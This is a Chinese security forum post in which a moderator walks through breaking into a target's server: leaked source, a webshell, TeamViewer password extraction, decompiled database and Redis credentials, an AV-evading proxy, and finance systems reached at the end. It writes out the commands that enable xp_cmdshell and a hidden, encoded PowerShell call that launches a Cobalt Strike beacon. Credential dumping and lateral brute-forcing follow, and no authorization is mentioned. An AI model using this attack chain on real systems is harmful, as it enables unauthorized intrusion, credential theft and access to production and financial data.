用户
搜索
  • TA的每日心情
    无聊
    5 天前
  • 签到天数: 36 天

    连续签到: 2 天

    [LV.5]常住居民I

    版主

    Rank: 7Rank: 7Rank: 7

    56

    主题

    166

    帖子

    1440

    魔法币
    收听
    0
    粉丝
    2
    注册时间
    2018-8-22

    春秋达人积极活跃奖

    发表于 2020-9-25 19:00:13 57917

    通过前期信息搜集获取到目标站的80xx端口
    1.png

    发现一处源码泄露
    查看配置文件

    2.png
    登录manage.aspx
    3.png

    上传shell
    发现安装了TeamViewer

    4.png
    看下进程如果运行tv的话,可直接读取其远程的账号密码
    https://github.com/uknowsec/SharpDecryptPwd
    SharpDecryptPwd
    对密码已保存在 Windwos 系统上的部分程序进行解析,包括:Navicat,TeamViewer,FileZilla,WinSCP,Xmangager系列产品(Xshell,Xftp)。
    本地演示如下
    5.png

    翻找文件,jar包反编译,获取到数据库账号密码和redis密码
    6.png
    由于shell不是system权限,且存在多个杀软。
    利用免杀frp代理,利用数据库提权
    xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重修开启它。
    开启xp_cmdshell
    execsp_configure 'show advanced options', 1;reconfigure;
    execsp_configure 'xp_cmdshell',1;reconfigure;
    7.png
    添加用户并添加到管理员组
    8.png
    由于装了天q,新添加的用户无法登录。
    那么利用数据库执行命令,上线cs
    cmdshell执行时需要编码一下
    9.png

    EXEC master.dbo.xp_cmdshell 'powershell.exe -nop -w hidden -enc xxxxxxxxxxxxxxxxxxxxxxx'
    上线cs,抓取密码

    10.png
    利用获取的密码进行横向爆破
    11.png
    发现多台服务器桌面存在密码本和连接生产系统的Anydesk
    12.png
    财务系统
    13.png
    内网没有域,就搞搞数据库和系统了。
    14.png
    关机下班。


    末心网络安全团队 | Q群374327762
    TQL
    使用道具 举报 回复
    发表于 2020-9-27 12:55:26

    哎,没表哥来卖菜了,应该是我太菜了
    末心网络安全团队 | Q群374327762
    使用道具 举报 回复
    可以
    使用道具 举报 回复
    发表于 2020-10-4 19:18:36

    表哥来吹水啊
    末心网络安全团队 | Q群374327762
    使用道具 举报 回复
    感谢分享
    剑未佩妥出门已是江湖
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册